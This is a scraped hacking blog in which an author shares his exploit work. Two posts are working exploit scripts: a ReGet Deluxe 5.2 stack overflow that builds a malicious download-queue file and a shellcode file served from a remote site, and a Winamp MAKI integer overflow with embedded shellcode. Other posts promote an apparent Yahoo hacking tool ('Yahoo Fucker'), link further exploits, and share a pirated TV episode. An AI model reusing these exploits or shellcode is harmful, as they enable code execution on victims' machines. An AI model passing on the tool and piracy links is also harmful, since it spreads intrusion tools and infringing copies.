ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit

hello

today i’ve discovered a pretty overflow in Reget download manager

i’ve spent the hole day trying to find out how to exploit it, and finally got it

the bug caused when parsing long characters in destination path for the downloaded file. the challenge is that you can’t put any kind of shellcode coz of restricted characters. even with the alpha encoding.also the address is a 2nd problem too.

so it’s maybe impossible to exploit it with that way.

i noticed that when i tried to put into download part ‘google.com’ for example the edi register points to a location in the memory where the contains of the web page saved.so i thought this would be the key :d

the other problem i’ve faced that when i try to open page from my localhost the edi would be”000000″. i didn’t know where the problem is

until i put large file and pointed to it and  PINGO the edi points again.

ok now all i need is to create my payload and execute the edi. but wait a minute….what about the address??? where will i put the jmp??

on the first place the app won’t crash if i put a random address.i mean an regular address like any jmp address.but i need an address would not corrupt my buffer string.so i found one in user32.dll (xp sp3). and put it all together and BANG…calc pops up

ok here is the exploit code:

import sys

print ""

print "    ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit"

print "    By: Encrypt3d.M!nd                                 "

print "    http://m1nd3d.wordpress.com/                       "

print "      For Details visit my blog                        "

print ""

try:

header = (

"\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22\x20\x65\x6E\x63\x6F"

"\x64\x69\x6E\x67\x3D\x22\x55\x54\x46\x2D\x38\x22\x20\x3F\x3E\x0D\x0A\x3C\x21\x2D\x2D\x20\x47\x65"

"\x6E\x65\x72\x61\x74\x65\x64\x20\x62\x79\x20\x52\x65\x47\x65\x74\x20\x44\x65\x6C\x75\x78\x65\x20"

"\x35\x2E\x32\x20\x28\x62\x75\x69\x6C\x64\x20\x33\x33\x30\x29\x20\x2D\x2D\x3E\x0D\x0A\x3C\x52\x65"

"\x47\x65\x74\x4A\x72\x0D\x0A\x09\x4C\x61\x73\x74\x49\x64\x3D\x22\x31\x22\x0D\x0A\x09\x50\x72\x65"

"\x64\x65\x66\x69\x6E\x65\x64\x43\x61\x74\x65\x67\x6F\x72\x69\x65\x73\x3D\x22\x31\x22\x0D\x0A\x09"

"\x54\x72\x61\x66\x66\x69\x63\x53\x75\x73\x70\x65\x6E\x64\x65\x64\x3D\x22\x31\x22\x0D\x0A\x09\x54"

"\x72\x61\x66\x66\x69\x63\x43\x6F\x6F\x70\x65\x72\x61\x74\x69\x76\x65\x3D\x22\x32\x22\x0D\x0A\x09"

"\x4D\x61\x78\x53\x65\x63\x74\x53\x75\x73\x70\x65\x6E\x64\x65\x64\x3D\x22\x31\x22\x0D\x0A\x09\x4D"

"\x61\x78\x53\x65\x63\x74\x43\x6F\x6F\x70\x65\x72\x61\x74\x69\x76\x65\x3D\x22\x31\x22\x0D\x0A\x09"

"\x4D\x61\x78\x53\x65\x63\x74\x55\x6E\x6C\x69\x6D\x69\x74\x65\x64\x3D\x22\x33\x22\x0D\x0A\x09\x53"

"\x61\x76\x65\x54\x6F\x3D\x22\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x20\x61\x6E\x64\x20"

"\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x75\x6E\x6B\x6E\x6F\x77\x6E\x5C\x4D\x79\x20\x44\x6F\x63\x75"

"\x6D\x65\x6E\x74\x73\x5C\x4D\x79\x20\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x73\x22\x0D\x0A\x09\x4D\x61"

"\x78\x45\x72\x72\x6F\x72\x43\x6F\x75\x6E\x74\x3D\x22\x31\x30\x30\x22\x0D\x0A\x09\x54\x72\x79\x50"

"\x61\x75\x73\x65\x3D\x22\x35\x22\x0D\x0A\x09\x54\x69\x6D\x65\x4F\x75\x74\x3D\x22\x39\x30\x22\x0D"

"\x0A\x09\x4D\x69\x6E\x53\x65\x63\x74\x69\x6F\x6E\x53\x69\x7A\x65\x3D\x22\x31\x30\x30\x30\x30\x22"

"\x0D\x0A\x09\x41\x75\x74\x6F\x53\x61\x76\x65\x52\x65\x73\x75\x6C\x74\x46\x69\x6C\x65\x3D\x22\x43"

"\x3A\x5C\x50\x72\x6F\x67\x72\x61\x6D\x20\x46\x69\x6C\x65\x73\x5C\x52\x65\x47\x65\x74\x20\x53\x6F"

"\x66\x74\x77\x61\x72\x65\x5C\x52\x65\x47\x65\x74\x20\x44\x65\x6C\x75\x78\x65\x5C\x73\x65\x61\x72"

"\x63\x68\x2E\x78\x6D\x6C\x22\x0D\x0A\x09\x3E\x0D\x0A\x09\x3C\x51\x75\x65\x75\x65\x3E\x0D\x0A\x09"

"\x09\x3C\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x0D\x0A\x09\x09\x09\x49\x64\x3D\x22\x31\x22\x0D\x0A\x09"

"\x09\x09\x46\x69\x6C\x65\x4E\x61\x6D\x65\x3D\x22\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73"

"\x20\x61\x6E\x64\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x75\x6E\x6B\x6E\x6F\x77\x6E\x5C\x4D\x79"

"\x20\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x5C\x4D\x79\x20\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x73\x5C"

"\x61\x2E\x65\x78\x65\x22\x0D\x0A\x09\x09\x09\x53\x74\x61\x74\x65\x3D\x22\x33\x22\x0D\x0A\x09\x09"

"\x09\x44\x6F\x6E\x74\x55\x73\x65\x43\x61\x74\x65\x67\x6F\x72\x79\x53\x6F\x72\x74\x69\x6E\x67\x3D"

"\x22\x30\x22\x0D\x0A\x09\x09\x09\x53\x74\x61\x72\x74\x44\x6C\x54\x69\x6D\x65\x3D\x22\x30\x22\x0D"

"\x0A\x09\x09\x09\x43\x72\x65\x61\x74\x69\x6F\x6E\x54\x69\x6D\x65\x3D\x22\x32\x35\x2E\x31\x32\x2E"

"\x32\x30\x30\x39\x20\x31\x34\x3A\x35\x38\x3A\x30\x32\x22\x0D\x0A\x09\x09\x09\x4C\x61\x73\x74\x53"

"\x74\x61\x72\x74\x54\x69\x6D\x65\x3D\x22\x30\x22\x0D\x0A\x09\x09\x09\x55\x72\x6C\x3D\x22\x68\x74"

"\x74\x70\x3A\x2F\x2F"+sys.argv[1]+"\x22\x0D\x0A\x09"

"\x09\x09\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x43\x61\x74\x65\x67\x6F\x72\x79\x3D\x22\x2D\x31\x22\x0D"

"\x0A\x09\x09\x09\x53\x61\x76\x65\x54\x6F\x3D\x22")

buff = "\x41" * 268

buff+= "\x5F\x4D\x48\x7E" # call edi - winxp sp3 (friendly chars)

buff+= "\x41" * 1000

foot = (

"\x22\x0D\x0A\x09\x09\x09\x41\x75\x74\x6F\x53\x74\x61\x72\x74\x43\x72\x65\x61\x74\x65\x3D\x22\x31"

"\x22\x0D\x0A\x09\x09\x20\x2F\x3E\x0D\x0A\x09\x3C\x2F\x51\x75\x65\x75\x65\x3E\x0D\x0A\x3C\x2F\x52"

"\x65\x47\x65\x74\x4A\x72\x3E\x0D\x0A")

evil = "\x90" * 100

evil+= (

"\x89\xe6\xd9\xc7\xd9\x76\xf4\x59\x49\x49\x49\x49\x49\x49\x49"

"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"

"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"

"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"

"\x4c\x4a\x48\x4c\x49\x43\x30\x43\x30\x45\x50\x45\x30\x4b\x39"

"\x4a\x45\x46\x51\x4e\x32\x51\x74\x4c\x4b\x46\x32\x44\x70\x4c"

"\x4b\x42\x72\x44\x4c\x4e\x6b\x43\x62\x42\x34\x4e\x6b\x51\x62"

"\x47\x58\x44\x4f\x48\x37\x51\x5a\x45\x76\x46\x51\x49\x6f\x45"

"\x61\x4f\x30\x4e\x4c\x47\x4c\x51\x71\x51\x6c\x45\x52\x46\x4c"

"\x47\x50\x4f\x31\x4a\x6f\x44\x4d\x45\x51\x4f\x37\x4d\x32\x48"

"\x70\x42\x72\x46\x37\x4c\x4b\x46\x32\x42\x30\x4e\x6b\x50\x42"

"\x45\x6c\x47\x71\x4e\x30\x4e\x6b\x51\x50\x51\x68\x4c\x45\x4f"

"\x30\x44\x34\x51\x5a\x46\x61\x48\x50\x42\x70\x4c\x4b\x50\x48"

"\x42\x38\x4c\x4b\x50\x58\x51\x30\x46\x61\x4e\x33\x4d\x33\x47"

"\x4c\x43\x79\x4c\x4b\x50\x34\x4c\x4b\x46\x61\x4a\x76\x46\x51"

"\x49\x6f\x44\x71\x49\x50\x4c\x6c\x4b\x71\x4a\x6f\x46\x6d\x47"

"\x71\x4f\x37\x46\x58\x4b\x50\x43\x45\x4a\x54\x43\x33\x43\x4d"

"\x4b\x48\x47\x4b\x43\x4d\x51\x34\x43\x45\x4b\x52\x42\x78\x4c"

"\x4b\x46\x38\x45\x74\x46\x61\x4a\x73\x45\x36\x4c\x4b\x46\x6c"

"\x50\x4b\x4e\x6b\x43\x68\x45\x4c\x46\x61\x4e\x33\x4c\x4b\x46"

"\x64\x4e\x6b\x43\x31\x4e\x30\x4e\x69\x51\x54\x46\x44\x51\x34"

"\x51\x4b\x51\x4b\x43\x51\x51\x49\x51\x4a\x50\x51\x49\x6f\x49"

"\x70\x51\x48\x51\x4f\x43\x6a\x4c\x4b\x42\x32\x4a\x4b\x4f\x76"

"\x43\x6d\x50\x6a\x47\x71\x4e\x6d\x4d\x55\x4e\x59\x47\x70\x43"

"\x30\x45\x50\x46\x30\x42\x48\x44\x71\x4e\x6b\x42\x4f\x4f\x77"

"\x4b\x4f\x4a\x75\x4d\x6b\x4d\x30\x45\x4d\x46\x4a\x44\x4a\x42"

"\x48\x49\x36\x4c\x55\x4d\x6d\x4d\x4d\x49\x6f\x4e\x35\x45\x6c"

"\x45\x56\x51\x6c\x44\x4a\x4b\x30\x4b\x4b\x4b\x50\x51\x65\x44"

"\x45\x4d\x6b\x50\x47\x44\x53\x42\x52\x50\x6f\x42\x4a\x43\x30"

"\x46\x33\x4b\x4f\x4a\x75\x42\x43\x50\x61\x50\x6c\x42\x43\x43"

"\x30\x41\x41")

evil+="\x41" * 70000

wjr_file=open('devil.wjr','w')

wjr_file.write(header+buff+foot)

wjr_file.close()

print "[+] 'devil.wjr' Created Successfully"

devil_file=open('shellcode','w')

devil_file.write(evil)

devil_file.close()

print "[+] 'shellcode' Created Successfully"

except:

print "###################################################"

print " Usage: exploit.py [payload]                       "

print "     [payload] = url to shellcode without(http://) "

print "    Example:                                       "

print "      exploit.py www.site.com/shellcode            "

usage:
exploit.py [url]
this file will create two files:
devil.wjr = ReGet file
shellcode = payload file.you must upload it to a webite.
for example if you upload it to www.site.com/shellcode
then the usage will be:
exploit.py www.site.com/shellcode
WITHOUT http://

finally
i would this would be usefull to some of people

Merry Chirstmas everyone and happy new year

كتاب: استغلال ثغرات الطفح Overflow Exploitation

السلام عليكم

الحمد لله اليوم انتهيت من كتاب صغير يشرح مبادىء استغلال ثغرات الطفح الي تحدث في تطبيقات الوندوز

صراحة الكتاب حاولت بي باقصى ما يمكن ان اسهله واسويه سهل للمبتدئين كبداية الهم,واختصرت كثير اشياء مهمة لكن اخذت الزبدة فقط
وايضاً صعب علية شرح بعض المصطلحات بالعربية فاتمنى اذا كان اكو اي شي مواضح بالكتاب ابلاغي به وان شاء الله افصله.

لتحميل الكتاب:
http://www.mediafire.com/?mjmnz1jn5zm

ملاحظة مهمة: يمنع نقل\نسخ\استعمال اي مادة في الكتاب بدون اذن شخصي من الكاتب.خلاف ذلك يحاسب المسؤول.

Back to the old habit

hey i miss posting here but i’m a little bit busy these days coz of the study and other reasons…. whatever… yesterday i’ve began a new stage to work on and the results of that was three exploits 1 fresh and two are just a correction for previously posted vulnerabilities well,check it out on exploit-db.com:

http://www.exploit-db.com/exploits/10322

http://www.exploit-db.com/exploits/10321

http://www.exploit-db.com/exploits/10320

my best wishes for everyone…..

Yahoo Fucker 2.5 – another release

hello

i’d like to introduce  the new version of Yahoo fucker

this edition contains some new features and fixes.and

alot of changes.

you can download and read more in the readme.txt file which

is included with the program:

http://www.zshare.net/download/64981957526fc5ea/
or

http://www.ziddu.com/download/6312975/Yahoo_Fucker.rar.html

source:

http://mini-5pider.com/index.php/2009/09/01/yahoo-fucker-2-5-by-soso-h-h.html

IMPORTANT:I’ve Saw Earlier Version that is  not of my release,and it contains  trojans and other kinds of viruses.so please DO NOT trust in any download link unless it was from Mini Spider Website or This  Blog.

Hello…

hello
i know it’s been a while since my last post but
i’ve dedicated my time on the internet for something
diffrent from wht i usually do…
i just wanna try normal people live and maybe
i’ll be back into my thing..:)

so,,be safe everyone

Winamp <= 5.551 Integer Overflow Exploit

Hello

i’ve just saw an poc for the maki exploit for winamp

http://milw0rm.com/exploits/8767

and thought to write an exploit for it:

i was in a hurry so i didn’t download the 5.55 1 version

and i just tested it on 5.51 but if it doesn’t work with you,just do some calculations.

shellcode will gonna execute windows calculator.

# Winamp <= 5.55 (MAKI script) Universal Integer Overflow Exploit
# By: Encrypt3d.M!nd
#
# Based on: http://milw0rm.com/exploits/8767
#
# place "mcvcore.maki" on "\Winamp\Skins\Bento\scripts" and run winmap
#
# NOTE:i've tested this on version 5.51,if it isn't workin' with your version.
#      just edit the calculations of the chars
#

header = (
"\x46\x47\x03\x04\x17\x00\x00\x00\x2A\x00\x00\x00"
"\x71\x49\x65\x51\x87\x0D\x51\x4A\x91\xE3\xA6\xB5"
"\x32\x35\xF3\xE7\x64\x0F\xF5\xD6\xFA\x93\xB7\x49"
"\x93\xF1\xBA\x66\xEF\xAE\x3E\x98\x7B\xC4\x0D\xE9"
"\x0D\x84\xE7\x4A\xB0\x2C\x04\x0B\xD2\x75\xF7\xFC"
"\xB5\x3A\x02\xB2\x4D\x43\xA1\x4B\xBE\xAE\x59\x63"
"\x75\x03\xF3\xC6\x78\x57\xC6\x87\x43\xE7\xFE\x49"
"\x85\xF9\x09\xCC\x53\x2A\xFD\x56\x65\x36\x60\x38"
"\x1B\x46\xA7\x42\xAA\x75\xD8\x3F\x66\x67\xBF\x73"
"\xF4\x7A\x78\xF4\xBB\xB2\xF7\x4E\x9C\xFB\xE7\x4B"
"\xA9\xBE\xA8\x8D\x02\x0C\x37\x3A\xBF\x3C\x9F\x43"
"\x84\xF1\x86\x88\x5B\xCF\x1E\x36\xB6\x5B\x0C\x5D"
"\xE1\x7D\x1F\x4B\xA7\x0F\x8D\x16\x59\x94\x19\x41"
"\x99\xE1\xE3\x4E\x36\xC6\xEC\x4B\x97\xCD\x78\xBC"
"\x9C\x86\x28\xB0\xE5\x95\xBE\x45\x72\x20\x91\x41"
"\x93\x5C\xBB\x5F\xF9\xF1\x17\xFD\x4E\x6D\x90\x60"
"\x7E\x53\x2E\x48\xB0\x04\xCC\x94\x61\x88\x56\x72"
"\xC0\xBC\x3A\x40\x22\x6F\xD6\x4B\x8B\xA4\x10\xC8"
"\x29\x93\x25\x47\x4D\x3E\xAA\x97\xD0\xF4\xA8\x4F"
"\x81\x7B\x0D\x0A\xF2\x2A\x45\x49\x83\xFA\xBB\xE4"
"\x64\xF4\x81\xD9\x49\xB0\xC0\xA8\x5B\x2E\xC3\xBC"
"\xFD\x3F\x5E\xB6\x62\x5E\x37\x8D\x40\x8D\xEA\x76"
"\x81\x4A\xB9\x1B\x77\xBE\x97\x4F\xCE\xB0\x77\x19"
"\x4E\x99\x56\xD4\x98\x33\xC9\x6C\x27\x0D\x20\xC2"
"\xA8\xEB\x51\x2A\x4B\xBA\x7F\x5D\x4B\xC6\x5D\x4C"
"\x71\x38\xBA\x1E\x8D\x9E\x48\x3E\x48\xB9\x60\x8D"
"\x1F\x43\xC5\xC4\x05\x40\xC9\x08\x0F\x39\xAF\x23"
"\x4B\x80\xF3\xB8\xC4\x8F\x7E\xBB\x59\x72\x86\xAA"
"\xEF\x0E\x31\xFA\x41\xB7\xDC\x85\xA9\x52\x5B\xCB"
"\x4B\x44\x32\xFD\x7D\x51\x37\x7C\x4E\xBF\x40\x82"
"\xAE\x5F\x3A\xDC\x33\x15\xFA\xB9\x5A\x7D\x9A\x57"
"\x45\xAB\xC8\x65\x57\xA6\xC6\x7C\xA9\xCD\xDD\x8E"
"\x69\x1E\x8F\xEC\x4F\x9B\x12\xF9\x44\xF9\x09\xFF"
"\x45\x27\xCD\x64\x6B\x26\x5A\x4B\x4C\x8C\x59\xE6"
"\xA7\x0C\xF6\x49\x3A\xE4\x05\xCB\x6D\xC4\x8A\xC2"
"\x48\xB1\x93\x49\xF0\x91\x0E\xF5\x4A\xFF\xCF\xDC"
"\xB4\xFE\x81\xCC\x4B\x96\x1B\x72\x0F\xD5\xBE\x0F"
"\xFF\xE1\x8C\xE2\x01\x59\xB0\xD5\x11\x97\x9F\xE4"
"\xDE\x6F\x51\x76\x0D\x0A\xBD\xF8\xF0\x80\xA5\x1B"
"\xA6\x42\xA0\x93\x32\x36\xA0\x0C\x8D\x4A\x1B\x34"
"\x2E\x9B\x98\x6C\xFA\x40\x8B\x85\x0C\x1B\x6E\xE8"
"\x94\x05\x71\x9B\xD5\x36\xFD\x03\xF8\x4A\x97\x95"
"\x05\x02\xB7\xDB\x26\x7A\x10\xF2\xD5\x7F\xC4\xAC"
"\xDF\x48\xA6\xA0\x54\x51\x57\x6C\xDC\x76\x35\xA5"
"\xBA\xB5\xB3\x05\xCB\x4D\xAD\xC1\xE6\x18\xD2\x8F"
"\x68\x96\xC1\xFE\x29\x61\xB7\xDA\x51\x4D\x91\x65"
"\x01\xCA\x0C\x1B\x70\xDB\xF7\x14\x95\xD5\x36\xED"
"\xE8\x45\x98\x0F\x3F\x4E\xA0\x52\x2C\xD9\x82\x4B"
"\x3B\x9B\x7A\x66\x0E\x42\x8F\xFC\x79\x41\x15\x80"
"\x9C\x02\x99\x31\xED\xC7\x19\x53\x98\x47\x98\x63"
"\x60\xB1\x5A\x29\x8C\xAA\x4D\xC1\xBB\xE2\xF6\x84"
"\x73\x41\xBD\xB3\xB2\xEB\x2F\x66\x55\x50\x94\x05"
"\xC0\x73\x1F\x96\x1B\x40\x9B\x1B\x67\x24\x27\xAC"
"\x41\x65\x22\xBA\x3D\x59\x77\xD0\x76\x49\xB9\x52"
"\xF4\x71\x36\x55\x40\x0B\x82\x02\x03\xD4\xAB\x3A"
"\x87\x4D\x87\x8D\x12\x32\x6F\xAD\xFC\xD5\x83\xC2"
"\xDE\x24\x6E\xB7\x36\x4A\x8C\xCC\x9E\x24\xC4\x6B"
"\x6C\x73\x37\x00")

ex = (
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF")

shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x51\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x69\x79\x4b\x4c\x4d"
"\x38\x70\x44\x55\x50\x45\x50\x75\x50\x6e\x6b\x77\x35\x67\x4c\x6c"
"\x4b\x43\x4c\x45\x55\x74\x38\x55\x51\x58\x6f\x4e\x6b\x52\x6f\x45"
"\x48\x4e\x6b\x43\x6f\x65\x70\x76\x61\x58\x6b\x50\x49\x4e\x6b\x36"
"\x54\x4e\x6b\x75\x51\x4a\x4e\x56\x51\x6b\x70\x4c\x59\x6c\x6c\x6e"
"\x64\x59\x50\x70\x74\x63\x37\x69\x51\x78\x4a\x56\x6d\x45\x51\x5a"
"\x62\x78\x6b\x6c\x34\x67\x4b\x51\x44\x36\x44\x74\x44\x30\x75\x4d"
"\x35\x6c\x4b\x31\x4f\x31\x34\x65\x51\x5a\x4b\x52\x46\x4c\x4b\x74"
"\x4c\x62\x6b\x6c\x4b\x61\x4f\x77\x6c\x35\x51\x7a\x4b\x6c\x4b\x57"
"\x6c\x4c\x4b\x37\x71\x5a\x4b\x4c\x49\x73\x6c\x77\x54\x47\x74\x38"
"\x43\x50\x31\x6b\x70\x32\x44\x4e\x6b\x61\x50\x66\x50\x4f\x75\x6b"
"\x70\x51\x68\x44\x4c\x6c\x4b\x77\x30\x36\x6c\x6e\x6b\x70\x70\x77"
"\x6c\x6c\x6d\x6c\x4b\x50\x68\x73\x38\x6a\x4b\x74\x49\x6c\x4b\x4b"
"\x30\x4c\x70\x63\x30\x73\x30\x45\x50\x4e\x6b\x45\x38\x35\x6c\x53"
"\x6f\x35\x61\x4c\x36\x75\x30\x71\x46\x6d\x59\x4a\x58\x4b\x33\x4f"
"\x30\x31\x6b\x70\x50\x43\x58\x61\x6e\x6e\x38\x4b\x52\x32\x53\x31"
"\x78\x4c\x58\x4b\x4e\x4c\x4a\x46\x6e\x50\x57\x6b\x4f\x5a\x47\x50"
"\x63\x31\x71\x30\x6c\x35\x33\x44\x6e\x63\x55\x44\x38\x35\x35\x37"
"\x70\x41")

chars = "A" * 301
chars2= "B" * 16100
file=open('mcvcore.maki','w')
file.write(header+ex+chars+"\xeb\x12\x41\x41"+"\x11\x10\xf0\x14"+"\x90"*20+shellcode+chars2)
file.close()

The Last Chapter….

i’m strongly sad to announce that but i have to…
i am gonna disconnect for a long while,,and i mean it this time coz
i have a lot of things i got to fix…

i hope that this spot helped and will help somebody in the things he was looking for…

with all my love
SaddaM

What Happend?!!…

i don’t know what has been changed

a while ago in about 2 years ago,i got the passion to read and learn

alot of stuffs..

Read more…

Prison Break S04-E17 99 mb

hello
like i’ve published eariler some of pb episodes
i’d like to share the 17th episode of the 4th season
and ofcurse it’s direct link and less than 100mb
so enjoy!

http://miamitropicslive.com/images/videos/.mov/(HaLinh.Vn)_Prison.Break.S04E17.REPACK.HDTV.XviD-0TV.rar

i’m still downloading it(2%) …so i didn’t see the episode or checked the file.so IT’S ON YOUR OWN RISK.

regards

Psycho thoughts..

hello

well,there are some things that make no sense to me and to alot of peoples

but it’s used alot in the wilde.

like the love and the heart thing,everybody say that the love is something

in the heart,but why?

Read more…